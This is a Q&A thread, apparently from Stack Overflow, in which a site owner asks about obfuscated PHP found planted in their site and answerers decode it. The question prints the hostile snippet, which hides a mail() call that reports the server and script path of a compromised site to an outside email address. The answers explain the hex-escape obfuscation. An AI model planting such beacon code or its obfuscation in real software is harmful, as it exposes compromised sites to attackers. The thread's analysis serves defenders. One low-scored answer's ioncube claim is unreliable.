# Does anyone know what this PHP code does?

Tags: php, code-injection

I Found this embedded in a php file on my site, can anyone tell me what it does?

```
$x0b="\x6da\x69l"; 
$ms = $_SERVER["S\x45R\126\105\x52_\x4e\101\x4dE"].$_SERVER["\123\x43R\111\x50\124_NA\x4d\105"];
$sub = "\x73\x68\145\x6cl\x20\076\076 :\x20" . $ms;
$o = array ("\x6fm","\164ma\151","\152\x5f\141\155\x72\x31","\x40\x68\x6f","\154.\x63");
$ee = $o[2].$o[3].$o[1].$o[4].$o[0];
$send = @$x0b($ee,$sub,$ms);
```

Comment: Related: [Is this a CakePHP hacking of some kind?](http://stackoverflow.com/q/8638352/367456)

Comment: Didn't look that legit, you should probably check your server / app / site for leaks, you'll want to figure out how that code got there.

Answer (score 3, accepted):

Looks evil! The script tries to sending an email to j_amr1@hotmail.com.

`@$x0b` executes the function with name from $x0b where `\x6da\x69l` is "mail" and @ suppresses any errors.

Receiver `$ee` is `j_amr1@hotmail.com`

The mail contains `SERVER_NAME` and `SCRIPT_NAME` from the `$_SERVER[]` variable.

You can use [codepad](http://codepad.org/PArOenCG) to print out the strings.

The strings are encoded `S\x45R\126\105\x52_\x4e\101\x4dE`. `S` is just plaintext. `\x45` is hex encoded and `\126` is a char number.

Comment: How/where did you actually decode it?

Comment: If I search for the code I find this [broken link](http://nasmis.dghs.gov.bd/dghs_new/media/keke.php?action=view&file=%2Fshare%2FMD0_DATA%2FQweb%2Fdghs_new%2Fmedia%2Finv.php). The page domain is from bangladesh goverment. [Hacked](http://nasmis.dghs.gov.bd/dghs_new/media/) by Iran group IDC-TEAM.ORG

Comment: Decode: http://codepad.org/PArOenCG

Answer (score 6):

It creates 4 variables. The first variable, $x0b, is the name of the function to be used, "mail".

```
$x0b = "mail";
```

The last 3 variables are who to send the email to, the subject and the mail body.

```
$ee = "j_amr1@hotmail.com"
$sub = "shell >> : file.php" ( file.php is the name of the script that contains this code )
$ms = "file.php" ( same as above )
```

You know you've been hacked :)

Comment: Indeed, [look at this](http://pastebay.com/271254) and [this](http://hostonanip.com/) :D

Answer (score 3):

This is pretty simple ASCII obfuscation and can be reversed quite simply.

*\x + [0-9]* basically is the Ascii form of a Letter, character or digit.

Any string wrapped within double quotes will be interpreted for ASCII chars, for example:

```
$E = "\x45"; //E
$R = "\x52"; //R
$ER = "\x45\x52"; //ER
```

Looking at the ASCII table below were looking at the *Hx column*, as these are hexadecimal character codes, so now we can use this to build up a function name in a hex string and call it like so:

```
$func = "\x6D\x61\x69\x6C"; //mail
```

and then use that variable to call a function like so:

```
$e = $func($a, $b, $c, $d);
```

Quite simple once you understand the howto use ASCII Representations.

[image]

Comment: Updated it with longer answer because of the 2 +1's

Answer (score 2):

It sends an email containing the location of the PHP script to the address j_amr1@hotmail.com

Is that script part of an application that you're supposed to have a paid site license for? This would be a way to check for people who use it without paying. Or it could be part of a backdoor that lets someone control your server.

Answer (score 0):

I believe the PHP code itself has been "obfuscated" (or encoded) by a tool like [ioncube](http://www.ioncube.com).
It can only be un-obfuscated by the same tool, although when run on the server it's installed  on, it will run normally.
Hope this helps

Comment: I know its obfuscated, I want to know what is says, I think its encoded in hex shell code, but not sure..